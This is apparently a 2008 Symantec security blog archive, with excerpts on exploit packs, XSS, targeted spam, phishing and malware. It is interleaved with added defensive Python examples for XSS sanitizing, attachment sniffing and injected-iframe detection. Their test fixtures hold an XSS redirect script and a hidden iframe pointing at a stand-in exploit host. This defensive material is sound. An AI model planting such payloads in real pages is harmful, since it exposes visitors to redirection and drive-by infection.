
Security Response

Showing posts for April of 2008
Liam O Murchu | 25 Apr 2008 23:25:31 GMT | 0 comments

The problem: You develop a software package that you want to sell in the underground community. However, your buyers are not the most reputable/trustworthy people. How do you prevent your product from being purchased once and then distributed freely afterwards? How do you enforce your “copyright”?

The solution: Ask the antivirus companies to help you out.

Here is a perfect example. The screen shot below is taken from a typical underground software package. Shown in the screen shot are the terms and conditions of the sale—the “licensing agreement.” Yes, that’s right; some underground packages come with a licensing agreement. The document is written in Russian, but a translation is provided below.

 

...

Liam O Murchu | 22 Apr 2008 14:24:42 GMT | 0 comments

We have recently received a new Web exploit pack called Tornado that contains exploits for 14 vulnerabilities by default. The pack also contains the usual stats and admin pages; however, the greatest success of this pack appears to be how well it has stayed under the radar.

Firstly, let’s take a look at what is in the pack. When a user logs into the Tornado administration control panel, the statistics page is shown, as presented below. This page shows how successful an exploit campaign has been to date. It shows the number of visitors to the exploit pack and how many of those visitors were successfully exploited, which includes a breakdown by OS and by browser type.

Another page shows the exploits that are available to...

Zulfikar Ramzan | 21 Apr 2008 23:53:38 GMT | 0 comments

On the eve of the much anticipated Pennsylvania Democratic Primary, we received public reports of a series of cross-site scripting vulnerabilities that affected Barack Obama's campaign Web site. We also saw reports of these vulnerabilities being disclosed publicly on the XSSed.com Web site. The corresponding code to exploit the vulnerabilities was used to redirect users to Hillary Clinton’s Web site.

Who says attackers don’t have a sense of humor? While a couple of these vulnerabilities were shored up before we could investigate them, we were able to examine some for validity.

At a high level, what appears to have happened is that an attacker took advantage of the fact that certain parts of the Obama campaign site allow users to post content, for example in the form of community blog postings. While most users take advantage of such features to post political commentary, at least one user decided to try posting something more insidious.

Here’s how such...
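The mechanism the post is describing is stored cross-site scripting: user-posted content written into the page unescaped runs in every other reader's browser. The following is an added example, not the campaign site's code or the actual exploit; the attacker post, the page template, the redirect host "rival.example" and the allowlist are all constructed here. It shows the vulnerable rendering beside two fixes: escaping the post as plain text, and, where posts may carry some formatting, an allowlist sanitizer that keeps a few tags and drops scripts, event handlers and non-http links.

```python
"""Added example (not the campaign site's code or the actual exploit):
stored XSS through user-posted blog content, and two ways to stop it.
The attacker post, page template and redirect host are constructed."""
import html
from html.parser import HTMLParser

# Constructed attacker post: a comment carrying a script that sends every
# reader to another site. "rival.example" is a placeholder host.
ATTACKER_POST = (
    'Great speech! <script>location.href="http://rival.example/";</script>'
)

PAGE_TEMPLATE = (
    '<html><body><h1>Community blog</h1>'
    '<div class="post">{body}</div></body></html>'
)

def render_vulnerable(user_text: str) -> str:
    """The failure mode: the post is pasted into the page verbatim, so any
    markup in it, <script> included, becomes live for every reader."""
    return PAGE_TEMPLATE.format(body=user_text)

def render_escaped(user_text: str) -> str:
    """Fix 1: treat the post as plain text. html.escape turns <, >, & and
    quotes into entities, so the browser shows the script instead of running it."""
    return PAGE_TEMPLATE.format(body=html.escape(user_text, quote=True))

# Fix 2: if posts may carry formatting, allowlist tags and attributes.
ALLOWED_TAGS = {"p", "b", "i", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_WITH_CONTENT = {"script", "style"}   # the tag and its contents both go

class AllowlistSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.parts: list[str] = []
        self.open_tags: list[str] = []
        self.skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                        # unknown tag: drop it, keep its text
        safe = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue                  # on* handlers never pass
            if name == "href" and not value.lower().startswith(("http://", "https://")):
                continue                  # blocks javascript: and data: URLs
            safe.append(f' {name}="{html.escape(value, quote=True)}"')
        self.parts.append(f"<{tag}{''.join(safe)}>")
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:             # close back to the matching tag
            closed = self.open_tags.pop()
            self.parts.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.parts.append(html.escape(data, quote=True))

    def result(self) -> str:
        while self.open_tags:             # close anything left open
            self.parts.append(f"</{self.open_tags.pop()}>")
        return "".join(self.parts)

def sanitize(user_html: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(user_html)
    parser.close()
    return parser.result()

def render_sanitized(user_html: str) -> str:
    return PAGE_TEMPLATE.format(body=sanitize(user_html))

if __name__ == "__main__":
    print(render_vulnerable(ATTACKER_POST))   # script survives: XSS
    print(render_escaped(ATTACKER_POST))      # script shown as text
    print(render_sanitized(ATTACKER_POST))    # script removed
```

Escaping is the right default; the allowlist is only for sites that must accept markup, and even then the href check is an allowlist of schemes rather than a denylist of "javascript:", since the latter is easy to evade with case, whitespace and encoding tricks.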

Zulfikar Ramzan | 18 Apr 2008 20:15:41 GMT | 0 comments

For some time now, Symantec has stressed that the online threat landscape shifted a few years back, away from hobbyist-driven threats towards financially driven threats. This trend has given rise to a class of malicious software known as "crimeware."

I recently had the pleasure of collaborating with Markus Jakobsson on a book, "Crimeware: Understanding New Attacks and Defenses," which studies the problem and where it seems to be heading. The book is an edited volume in which we were fortunate to include contributions that were received from top experts across industry and academia all over the world.

We worked on the book to bring to light the fact that the game has changed considerably. The book covers the following topics:

- A general overview of crimeware, including a taxonomy of well-known threats such as keyloggers, screenscrapers, rootkits, botnets, and the like.
- A more detailed study of well...

khaley | 16 Apr 2008 20:00:21 GMT | 0 comments

Sometimes in this job you can be a killjoy. Take, for instance, a situation I was involved in a couple of weeks ago. I had the unpleasant task of informing someone that they were not going to be given 12 million dollars.

I had been invited on the morning show at KSON-FM in San Diego. One of the DJs had received an email he wanted to ask me about. I assumed it was a phishing attack, or perhaps the recent IRS scam that Kelly Conley has blogged about. It turned out he had received an email telling him he was going to be given 12 million dollars. I had to ruin his day. He was not going to be rich, and if he wasn’t careful he might become a victim of the old Spanish Prisoner scam.

This con has been around since the 16th century. Five hundred years ago you would have received a letter from a man held in a Spanish prison. The...

Shunichi Imano | 14 Apr 2008 22:16:03 GMT | 0 comments

Today, April 14th, 2008, Symantec Security Response received reports from a number of our customers regarding a possible targeted spam attack against several Japanese companies.

The spam email associated with this attack is spoofed to appear to come from a Japanese government agency and entices the user to open the attached .zip file to check recent organizational changes. The attached .zip file contains two files: 0414.xls and 0414.exe. 0414.xls is a legitimate spreadsheet containing a list of names, addresses, and personnel positions that may or may not be real. There is no evidence that this file carries any exploit.

However, the other file, 0414.exe, is a variant of Backdoor.Darkmoon, which has keylogging capabilities. At the time of writing, we have seen several variants of...

Andrea DelMiglio | 11 Apr 2008 17:58:55 GMT | 0 comments

Symantec has been notified that the Web site ladestra.info, a site related to a right-wing Italian political party, has been compromised. The site is hosting a malicious iframe that leads to a typical browser exploit served by the Neosploit tool; on a successfully exploited computer this installs the newest version of Trojan.Mebroot.

Using elections as a channel for spreading malicious code is something we have already seen (for example,...

Joseph Blackbird | 11 Apr 2008 17:53:05 GMT | 0 comments

Phishing is an attempt by a third party to solicit confidential information from an individual, group, or organization by mimicking (spoofing) a specific, usually well-known brand, usually for financial gain. Phishers attempt to trick users into disclosing personal data, such as credit card numbers, online banking credentials, and other sensitive information, which they may then use to commit fraudulent acts.

 

During the second half of 2007, the majority of brands targeted by phishing attacks were in the financial services sector, accounting for 80 percent. This is virtually unchanged from the 79 percent reported in the first half of 2007. The financial services sector also accounted for the highest volume of phishing Web sites during this period, at 66 percent, down slightly from 72 percent in the first half of 2007. Since most phishing activity pursues financial gain, successful attacks using brands in this sector are most likely to yield profitable data, such...

Sean Hittel | 10 Apr 2008 22:22:40 GMT | 0 comments

It has been less than two days since Microsoft announced a couple of vulnerabilities in the handling of EMF-formatted images by the graphics device interface (GDI), but our DeepSight honeypots are already showing signs of exploitation in the wild. Although the exploits we have seen so far do not yet appear to be functional, they have the right general idea. It is possible that these are leaked, in-progress copies, or that they work on some platform we have not tested.

However, the exploit (named "top.jpg") does contain functional payload, which downloads a secondary file (word.gif). Word.gif is really an executable that would be run following a successful infection. Its main function would be to use iexplore.exe to contact a few hosts in China, presumably to download additional malicious code.

The exploit image is detected by Symantec IPS-enabled products as...
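Two of the posts above turn on the same trick: a file whose name says one thing and whose bytes say another. In the Japanese targeted-spam case the .zip pairs a decoy 0414.xls with 0414.exe; in the GDI case word.gif is really an executable. The following is an added example, not Symantec's code or either attack's real files: it sniffs the leading bytes of an attachment, flags content that contradicts the extension, and flags an archive that bundles a document with an executable. The sample files are built in memory and only their headers resemble the formats named.

```python
"""Added example (not Symantec's code or either attack's real files):
identify attachments by their leading bytes and flag name/content
mismatches and document-plus-executable archives. Samples are constructed."""
import io
import zipfile

# Leading bytes of the formats that matter here. "ole2-document" is the
# legacy binary container behind .xls/.doc files.
MAGIC = {
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2-document",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"PK\x03\x04": "zip",
    b"\xff\xd8\xff": "jpeg",
    b"MZ": "pe-executable",
}

# What each extension claims to contain.
EXPECTED = {
    ".xls": "ole2-document", ".doc": "ole2-document",
    ".gif": "gif", ".jpg": "jpeg", ".jpeg": "jpeg", ".zip": "zip",
    ".exe": "pe-executable", ".scr": "pe-executable", ".dll": "pe-executable",
}

def sniff(head: bytes) -> str:
    """Classifies a file by its first bytes; 'unknown' when nothing matches."""
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    return "unknown"

def extension_of(name: str) -> str:
    base = name.rsplit("/", 1)[-1].lower()
    return base[base.rfind("."):] if "." in base else ""

def assess_file(name: str, head: bytes) -> dict:
    """Reasons to distrust one file: executable content, or content that
    contradicts the extension (the word.gif case)."""
    kind = sniff(head)
    reasons = []
    if kind == "pe-executable":
        reasons.append("executable content")
    ext = extension_of(name)
    expected = EXPECTED.get(ext)
    if expected and kind != "unknown" and kind != expected:
        reasons.append(f"named {ext} but content is {kind}")
    return {"name": name, "type": kind, "reasons": reasons}

def assess_archive(zip_bytes: bytes) -> dict:
    """Assesses every member of a zip attachment and adds an archive-level
    reason when a document is bundled with an executable (the 0414.zip pattern)."""
    members = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(16)          # header bytes suffice for sniffing
            members.append(assess_file(info.filename, head))
    types = {m["type"] for m in members}
    archive_reasons = []
    if "pe-executable" in types and "ole2-document" in types:
        archive_reasons.append("document bundled with executable (decoy pattern)")
    return {"members": members, "archive_reasons": archive_reasons}

# Constructed samples standing in for the real attachments: only the
# headers are realistic, the rest is padding.
OLE_HEADER = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
PE_HEADER = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56
FAKE_WORD_GIF = PE_HEADER                   # named word.gif, really an executable

def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("0414.xls", OLE_HEADER)   # the decoy personnel list
        zf.writestr("0414.exe", PE_HEADER)    # the backdoor
    return buf.getvalue()

if __name__ == "__main__":
    print(assess_file("word.gif", FAKE_WORD_GIF))
    print(assess_archive(build_sample_zip()))
```

Sniffing by magic is a triage step, not a verdict: a file that sniffs as "unknown" still deserves a look, and the mismatch rule deliberately stays quiet for those so that exotic but honest formats do not drown the real findings.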

Marc Fossi | 10 Apr 2008 22:17:28 GMT | 0 comments

In late May 2007, the MPack attack kit was first observed in the wild. This kit relied on compromised Web pages to redirect users to an MPack server that attempted to exploit Web browser and plug-in vulnerabilities in order to install malicious code on computers. MPack experienced great success because it took advantage of the trust many users place in certain Web sites. Since the Web browser is the primary gateway to the Internet for most users, Web pages that they visit frequently—such as online forums and other Internet communities—are a useful means of compromising computers for attackers.

Because of the success of kits like MPack and Ice-Pack, it seems that malicious code authors have begun to incorporate similar features in the threats they create. In the current period, seven percent of the volume of the top 50 malicious code samples...
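Both the ladestra.info compromise and the MPack kit described here depend on one redirection step: an iframe injected into a trusted page that silently pulls the exploit server's content. The following is an added example, not the injected code from either case: it collects the iframes in a fetched page and reports the tells that mark an injected one (content from another host, a zero- or one-pixel size, hidden by style). The sample page and the host names "party.example" and "exploit.example" are constructed.

```python
"""Added example (not the injected code from ladestra.info or MPack):
find iframes in a page that look injected. Sample page and hosts are
constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> in the page."""
    def __init__(self) -> None:
        super().__init__()
        self.iframes: list[dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

def _tiny(value) -> bool:
    """True for a width/height of 0 or 1 pixel, the usual way to hide the frame."""
    if value is None:
        return False
    digits = value.strip().lower().removesuffix("px")
    return digits.isdigit() and int(digits) <= 1

def suspicious_iframes(page_html: str, page_host: str) -> list:
    """Returns each iframe that shows at least one injection tell, with reasons."""
    parser = IframeCollector()
    parser.feed(page_html)
    parser.close()
    findings = []
    for attrs in parser.iframes:
        reasons = []
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        if host and host != page_host:
            reasons.append(f"loads content from another host: {host}")
        if _tiny(attrs.get("width")) or _tiny(attrs.get("height")):
            reasons.append("zero or one pixel in size")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings

# Constructed page: one legitimate same-site embed and one injected frame
# appended after </html>, where compromised pages commonly carried it.
SAMPLE_PAGE = """<html><body>
<h1>Party news</h1>
<iframe src="/embed/schedule.html" width="400" height="300"></iframe>
</body></html>
<iframe src="http://exploit.example/in.cgi?3" width=0 height=0 style="display: none"></iframe>
"""

if __name__ == "__main__":
    for finding in suspicious_iframes(SAMPLE_PAGE, "party.example"):
        print(finding)
```

This catches only literal iframe tags. Kits of this generation also emitted the frame from obfuscated script (document.write of an iframe string), so in practice the same check is run over the page as the browser renders it, or the script bodies are searched for the iframe string as well.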